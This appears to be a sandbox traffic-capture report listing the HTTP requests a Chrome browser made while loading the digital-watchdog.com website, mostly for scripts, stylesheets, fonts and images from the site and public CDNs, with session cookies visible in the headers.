    Source: global trafficHTTP traffic detected: GET /bootstrap/4.3.1/js/bootstrap.bundle.min.js HTTP/1.1host: stackpath.bootstrapcdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
    Source: global trafficHTTP traffic detected: GET /aos@2.3.4/dist/aos.js HTTP/1.1host: unpkg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
    Source: global trafficHTTP traffic detected: GET /js/jquery.maskedinput.min.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
    Source: global trafficHTTP traffic detected: GET /js/bootstrap-datepicker.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /js/jqBootstrapValidation.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick.min.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
    Source: global trafficHTTP traffic detected: GET /js/jquery-phone-inputmask.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /css/framework.css HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/css/style.css?20250530073516Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /library/jquery-toast/dist/toastr.min.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /js/script.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /js/custom-script.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /tinymce/tinymce.min.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /library/Cookie-Alert/cookiealert.js HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /js/xdate.js HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /library/select2/css/select2.min.css HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js?20250530073516 HTTP/1.1host: code.jquery.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
    Source: global trafficHTTP traffic detected: GET /library/select2/css/select2pp.css HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /assets/20220503113243-img-246952568.svg HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon1.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon2.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon3.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D
    Source: global trafficHTTP traffic detected: GET /library/select2/js/select2.min.js HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /js/auto-suggest.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /js/auto-suggest-pages.js?20250530073516 HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon4.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /js/267707.js HTTP/1.1Host: secure.enterpriseforesight247.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/dw-topnav-logo.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /fonts/ItalianPlateNo2Expanded-Bold.woff2 HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveOrigin: https://digital-watchdog.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://digital-watchdog.com/css/style.css?20250530073516Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon5.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/Clearance_Zone_button.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /assets/Inventory_Clearance_Banner.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /assets/form_loading_new.gif HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
